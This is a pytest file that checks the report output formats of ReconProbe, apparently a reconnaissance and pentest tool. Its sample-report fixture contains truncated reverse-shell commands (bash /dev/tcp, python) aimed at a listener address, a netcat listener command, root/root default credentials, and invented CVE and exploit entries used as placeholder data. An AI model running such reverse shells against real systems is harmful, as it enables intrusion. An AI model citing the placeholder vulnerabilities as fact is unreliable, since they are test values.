"""Integration tests for ReconProbe output format validation.

These tests validate that all report output formats produce valid,
well-structured files that can be parsed and consumed by downstream tools.
"""

from __future__ import annotations

import csv
import io
import json
from pathlib import Path
from typing import Any

import pytest


# ── Sample scan report fixture ────────────────────────────────────────

@pytest.fixture(scope="module")
def sample_report() -> dict:
    """Return a comprehensive sample scan report for output testing.
    
    This mimics the structure of a real ReconProbe report generated by
    the reporter module's build_full_report function.
    """
    return {
        "tool": "ReconProbe",
        "version": "1.0.0",
        "scan_info": {
            "domain": "test.local",
            "start_time": "2026-05-25T10:00:00",
            "end_time": "2026-05-25T10:05:00",
            "duration_seconds": 300.0,
            "total_phases_completed": 18,
        },
        "target": {
            "domain": "test.local",
            "ip_addresses": ["127.0.0.1"],
            "ports_scanned": [80, 443, 8080],
        },
        "subdomain_enumeration": {
            "domain": "test.local",
            "total_found": 3,
            "total_resolved": 2,
            "results": [
                {"hostname": "www.test.local", "ip_address": "127.0.0.1",
                 "source": "crt.sh", "resolved": True},
                {"hostname": "api.test.local", "ip_address": "127.0.0.2",
                 "source": "brute-force", "resolved": True},
                {"hostname": "dev.test.local", "ip_address": "",
                 "source": "permutation", "resolved": False},
            ],
        },
        "port_scanning": {
            "total_hosts_scanned": 1,
            "hosts": [
                {
                    "hostname": "localhost",
                    "ip_address": "127.0.0.1",
                    "open_ports": 2,
                    "ports": [
                        {"port": 80, "state": "open", "service": "http",
                         "banner": "HTTP/1.1 200 OK",
                         "service_version": {"product": "nginx", "version": "1.24.0"},
                         "os_fingerprint": {}},
                        {"port": 443, "state": "open", "service": "https",
                         "banner": "", "service_version": {}, "os_fingerprint": {}},
                    ],
                }
            ]
        },
        "http_probe": {
            "results": {
                "localhost": {
                    "hostname": "localhost",
                    "alive_count": 1,
                    "results": [
                        {"url": "http://localhost:80/", "status_code": 200,
                         "title": "Home Page", "technologies": [
                             {"name": "nginx", "version": "1.24.0"},
                             {"name": "PHP", "version": "8.2.0"},
                         ]},
                    ],
                }
            }
        },
        "vulnerability_scan": {
            "total_cves": 2,
            "total_creds": 1,
            "cve_matches": [
                {"cve_id": "CVE-2024-1234", "cvss_score": 7.5,
                 "cvss_severity": "HIGH", "description": "Remote code execution in nginx",
                 "service": "nginx", "version_range": "<= 1.24.0"},
                {"cve_id": "CVE-2024-5678", "cvss_score": 5.0,
                 "cvss_severity": "MEDIUM", "description": "XSS vulnerability",
                 "service": "php", "version_range": "<= 8.2.0"},
            ],
            "default_credentials": [
                {"service": "MySQL", "hostname": "127.0.0.1", "port": 3306,
                 "username": "root", "password": "root"},
            ],
        },
        "ssl_audit": {
            "total_audited": 1,
            "results": {
                "127.0.0.1:443": {
                    "hostname": "127.0.0.1", "port": 443, "grade": "B",
                    "total_issues": 2,
                    "certificate": {
                        "subject": "CN=test.local",
                        "issuer": "CN=Test CA",
                        "is_expired": False,
                        "is_self_signed": True,
                        "days_remaining": 350,
                        "will_expire_soon": False,
                    },
                    "protocols": [
                        {"protocol": "TLS 1.2", "supported": True, "secure": True},
                        {"protocol": "TLS 1.3", "supported": True, "secure": True},
                        {"protocol": "TLS 1.1", "supported": False, "secure": False},
                    ],
                    "headers": [
                        {"header": "Strict-Transport-Security",
                         "value": "max-age=31536000", "secure": True},
                        {"header": "X-Frame-Options",
                         "value": "SAMEORIGIN", "secure": True},
                    ],
                }
            },
        },
        "takeover": {
            "total_checked": 3,
            "total_vulnerable": 1,
            "results": [
                {"hostname": "dev.test.local", "cname": "dev.test.local.s3.amazonaws.com",
                 "service": "AWS S3", "confidence": "high",
                 "is_vulnerable": True},
            ],
        },
        "waf_detect": {
            "total_scanned": 1,
            "total_protected": 1,
            "results": {
                "http://localhost:80/": {
                    "url": "http://localhost:80/",
                    "is_protected": True,
                    "detected_wafs": [
                        {"name": "Cloudflare", "certainty": 85},
                    ],
                }
            },
        },
        "exploit_suggestion": {
            "total_suggestions": 3,
            "searchsploit_available": False,
            "suggestions": [
                {"edb_id": "EDB-50001", "title": "nginx 1.24.0 RCE",
                 "service": "nginx", "reliability": "high",
                 "exploit_type": "remote", "cve_id": "CVE-2024-1234",
                 "rank": 9},
                {"edb_id": "EDB-50002", "title": "PHP 8.2.0 LFI",
                 "service": "php", "reliability": "medium",
                 "exploit_type": "remote", "cve_id": "", "rank": 6},
            ],
        },
        "payload": {
            "lhost": "10.0.0.1", "lport": 4444,
            "total_payloads": 2,
            "payloads": [
                {"type": "python", "command": "python3 -c 'import...'",
                 "listener_command": "nc -lvnp 4444",
                 "description": "Python reverse shell"},
                {"type": "bash", "command": "bash -i >& /dev/tcp/...",
                 "listener_command": "nc -lvnp 4444",
                 "description": "Bash reverse shell"},
            ],
        },
        "loot": {
            "total_count": 4,
            "critical_count": 1,
            "high_count": 2,
            "medium_count": 1,
            "items": [
                {"type": "api_key", "value": "sk-test-12345",
                 "severity": "critical", "source": "http_probe",
                 "description": "API key exposed in HTTP response"},
                {"type": "email", "value": "admin@test.local",
                 "severity": "high", "source": "crawl",
                 "description": "Email address discovered"},
            ],
        },
        "osint": {
            "total_findings": 5,
            "severity_counts": {"critical": 0, "high": 1, "medium": 2, "low": 2},
            "source_counts": {"github": 1, "email": 2, "whois": 1, "social": 1},
            "findings": [
                {"type": "exposed_secret", "value": "github_api_token",
                 "severity": "high", "source": "github_dork",
                 "description": "GitHub API token found in public repo"},
                {"type": "email", "value": "admin@test.local",
                 "severity": "medium", "source": "email_harvest",
                 "description": "Admin email discovered"},
            ],
        },
    }


@pytest.mark.integration
class TestJSONOutput:
    """Test JSON output format validity and structure."""
    
    def test_json_report_is_valid(self, sample_report: dict) -> None:
        """Test that the report serializes to valid JSON."""
        json_str = json.dumps(sample_report, indent=2, default=str)
        parsed = json.loads(json_str)
        assert parsed is not None
        assert isinstance(parsed, dict)
    
    def test_json_contains_required_fields(self, sample_report: dict) -> None:
        """Test that JSON report has all required top-level fields."""
        required_fields = [
            "scan_info", "target", "subdomain_enumeration", "port_scanning",
            "http_probe", "vulnerability_scan", "ssl_audit", "takeover",
            "waf_detect", "exploit_suggestion", "payload", "loot", "osint",
        ]
        for field in required_fields:
            assert field in sample_report, f"Missing required field: {field}"
    
    def test_json_report_format_match(self, temp_output_dir: Path, sample_report: dict) -> None:
        """Test that the JSON report matches expected structure from reporter module."""
        from reconprobe.reporter import output_json
        
        json_path = temp_output_dir / "test_report.json"
        output_json(sample_report, json_path)
        
        assert json_path.exists()
        with open(json_path) as f:
            parsed = json.load(f)
        
        assert parsed["scan_info"]["domain"] == "test.local"
        assert parsed["scan_info"]["duration_seconds"] == 300.0
        assert parsed["subdomain_enumeration"]["total_found"] == 3
    
    def test_json_report_body_roundtrip(self, temp_output_dir: Path) -> None:
        """Test JSON report body can be generated and read back."""
        from reconprobe.reporter import build_full_report, output_json
        from datetime import datetime
        
        # Build a minimal report
        report = build_full_report(
            domain="test.local",
            subdomain_report=None,
            scan_reports=[],
            http_probe_reports={},
            screenshot_reports={},
            crawl_reports={},
            dirbuster_reports={},
            enrichment_report={},
            start_time=datetime.now(),
            end_time=datetime.now(),
        )
        
        json_path = temp_output_dir / "minimal_report.json"
        output_json(report, json_path)
        
        assert json_path.exists()
        assert json_path.stat().st_size > 0
        
        with open(json_path) as f:
            parsed = json.load(f)
        
        assert parsed["target"]["domain"] == "test.local"


@pytest.mark.integration
class TestMarkdownOutput:
    """Test Markdown output format validity and structure."""
    
    def test_markdown_report_generates(self, temp_output_dir: Path) -> None:
        """Test that Markdown report file is generated."""
        from reconprobe.reporter import build_full_report, output_markdown
        from datetime import datetime
        
        report = build_full_report(
            domain="test.local",
            subdomain_report=None,
            scan_reports=[],
            http_probe_reports={},
            screenshot_reports={},
            crawl_reports={},
            dirbuster_reports={},
            enrichment_report={},
            start_time=datetime.now(),
            end_time=datetime.now(),
        )
        
        md_path = temp_output_dir / "test_report.md"
        output_markdown(report, md_path)
        
        assert md_path.exists()
        content = md_path.read_text()
        assert len(content) > 0
        assert "test.local" in content
    
    def test_markdown_contains_sections(self, temp_output_dir: Path, sample_report: dict) -> None:
        """Test that Markdown report has proper section headers."""
        from reconprobe.reporter import output_markdown
        
        md_path = temp_output_dir / "full_report.md"
        output_markdown(sample_report, md_path)
        
        content = md_path.read_text()
        assert content.startswith("#")  # Should start with a heading
        assert "test.local" in content
        
        # Should reference key findings
        assert "CVE" in content or "cve" in content
    
    def test_markdown_proper_table_formatting(self, sample_report: dict) -> None:
        """Test that Markdown tables are well-formatted."""
        from reconprobe.reporter import output_markdown
        import tempfile
        
        with tempfile.NamedTemporaryFile(mode="w", suffix=".md", delete=False) as f:
            md_path = Path(f.name)
        
        try:
            output_markdown(sample_report, md_path)
            content = md_path.read_text()
            
            # Markdown tables should have consistent column counts
            lines = content.split("\n")
            for i, line in enumerate(lines):
                if "|" in line and i + 1 < len(lines):
                    next_line = lines[i + 1]
                    if next_line.startswith("|---"):
                        # This is a table header - validate format
                        assert "|" in next_line
        finally:
            if md_path.exists():
                md_path.unlink()


@pytest.mark.integration
class TestHTMLOutput:
    """Test HTML output format validity and structure."""
    
    def test_html_report_generates(self, temp_output_dir: Path) -> None:
        """Test that HTML report file is generated and valid."""
        from reconprobe.html_reporter import generate_html_report
        from reconprobe.reporter import build_full_report
        from datetime import datetime
        
        report = build_full_report(
            domain="test.local",
            subdomain_report=None,
            scan_reports=[],
            http_probe_reports={},
            screenshot_reports={},
            crawl_reports={},
            dirbuster_reports={},
            enrichment_report={},
            start_time=datetime.now(),
            end_time=datetime.now(),
        )
        
        html_content = generate_html_report(report)
        
        assert html_content is not None
        assert len(html_content) > 0
        assert "<!DOCTYPE html>" in html_content or "<html" in html_content
    
    def test_html_contains_chartjs_panels(self, temp_output_dir: Path) -> None:
        """Test that HTML dashboard includes Chart.js visualization panels."""
        from reconprobe.html_reporter import generate_html_report
        
        # Use full sample report for richer output
        html_content = generate_html_report(
            self._get_rich_report(),
        )
        
        # HTML should reference Chart.js
        assert "chart.js" in html_content.lower() or "Chart" in html_content
        assert "canvas" in html_content
    
    def test_html_contains_summary_cards(self, sample_report: dict) -> None:
        """Test that HTML dashboard includes summary cards."""
        from reconprobe.html_reporter import generate_html_report
        
        html_content = generate_html_report(sample_report)
        
        # Should have summary cards for key metrics
        assert "3</div>" in html_content or "3</span>" in html_content  # total subdomains
        assert "Subdomains Found" in html_content
    
    def _get_rich_report(self) -> dict:
        """Build a rich full report with all modules enabled."""
        from reconprobe.reporter import build_full_report
        from reconprobe.subdomain import SubdomainReport, SubdomainResult
        from reconprobe.scanner import HostScanReport, PortResult
        from reconprobe.http_probe import HttpProbeReport, HttpProbeResult
        from datetime import datetime
        
        subdomain_report = SubdomainReport(domain="test.local")
        subdomain_report.results = [
            SubdomainResult(hostname="www.test.local", ip_address="10.0.0.1",
                          source="crt.sh", resolved=True),
        ]
        subdomain_report.total_found = 1
        subdomain_report.total_resolved = 1
        
        scan_report = HostScanReport(hostname="www.test.local", ip_address="10.0.0.1")
        scan_report.ports = [
            PortResult(port=80, state="open", service="http", banner="nginx"),
            PortResult(port=443, state="open", service="https"),
        ]
        scan_report.open_ports = 2
        
        http_report = HttpProbeReport(hostname="www.test.local")
        http_report.results = [
            HttpProbeResult(url="http://www.test.local", status_code=200,
                          title="Test", server_header="nginx",
                          technologies=[{"name": "nginx", "version": "1.24.0"}]),
        ]
        http_report.alive_count = 1
        
        return build_full_report(
            domain="test.local",
            subdomain_report=subdomain_report,
            scan_reports=[scan_report],
            http_probe_reports={"www.test.local": http_report},
            screenshot_reports={},
            crawl_reports={},
            dirbuster_reports={},
            enrichment_report={},
            start_time=datetime.now(),
            end_time=datetime.now(),
            vuln_scan_report={
                "total_cves": 2,
                "total_creds": 0,
                "cve_matches": [
                    {"cve_id": "CVE-2024-TEST", "cvss_score": 9.0,
                     "cvss_severity": "CRITICAL", "description": "Test CVE",
                     "service": "nginx", "version_range": "<= 1.24.0"},
                ],
            },
        )


@pytest.mark.integration
class TestReportingEnhancements:
    """Test reporting automation features (exec summary, CSV, etc.)."""
    
    def test_executive_summary_generates(self, temp_output_dir: Path) -> None:
        """Test that executive summary text file is generated."""
        from reconprobe.reporting import run_reporting_enhancements
        from reconprobe.reporter import build_full_report
        from datetime import datetime
        
        report = build_full_report(
            domain="test.local",
            subdomain_report=None,
            scan_reports=[],
            http_probe_reports={},
            screenshot_reports={},
            crawl_reports={},
            dirbuster_reports={},
            enrichment_report={},
            start_time=datetime.now(),
            end_time=datetime.now(),
        )
        
        result = run_reporting_enhancements(
            report=report,
            output_dir=temp_output_dir,
            generate_pdf=False,
            generate_csv=False,
            generate_xlsx=False,
            generate_exec_summary=True,
        )
        
        assert "exec_summary" in result
        summary_path = result["exec_summary"]
        assert summary_path.exists()
        content = summary_path.read_text()
        assert len(content) > 0
        assert "test.local" in content
    
    def test_csv_export_generates(self, temp_output_dir: Path, sample_report: dict) -> None:
        """Test that CSV export generates a valid CSV string."""
        from reconprobe.reporting import export_findings_csv
        
        csv_content = export_findings_csv(sample_report)
        assert len(csv_content) > 0
        
        # Validate CSV can be parsed
        reader = csv.reader(io.StringIO(csv_content))
        rows = list(reader)
        
        assert len(rows) > 1  # Header + at least one data row
        assert "Category" in rows[0] or "CVE" in rows[0] or "type" in rows[0]
    
    def test_cvss_calculator(self) -> None:
        """Test CVSS v3.1 calculator produces correct scores."""
        from reconprobe.reporting import calculate_cvss_score
        
        # CVSS v3.1 for critical severity (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
        result = calculate_cvss_score(
            attack_vector="NETWORK",
            attack_complexity="LOW",
            privileges_required="NONE",
            user_interaction="NONE",
            scope="UNCHANGED",
            confidentiality="HIGH",
            integrity="HIGH",
            availability="HIGH",
        )
        
        assert result["score"] == 9.8  # Industry standard for this vector
        assert result["severity"] == "CRITICAL"
        assert result["vector_string"] == "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        
        # CVSS v3.1 for low severity (AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N)
        result = calculate_cvss_score(
            attack_vector="LOCAL",
            attack_complexity="HIGH",
            privileges_required="HIGH",
            user_interaction="REQUIRED",
            scope="UNCHANGED",
            confidentiality="LOW",
            integrity="NONE",
            availability="NONE",
        )
        
        assert result["severity"] == "LOW"
        assert result["score"] < 4.0
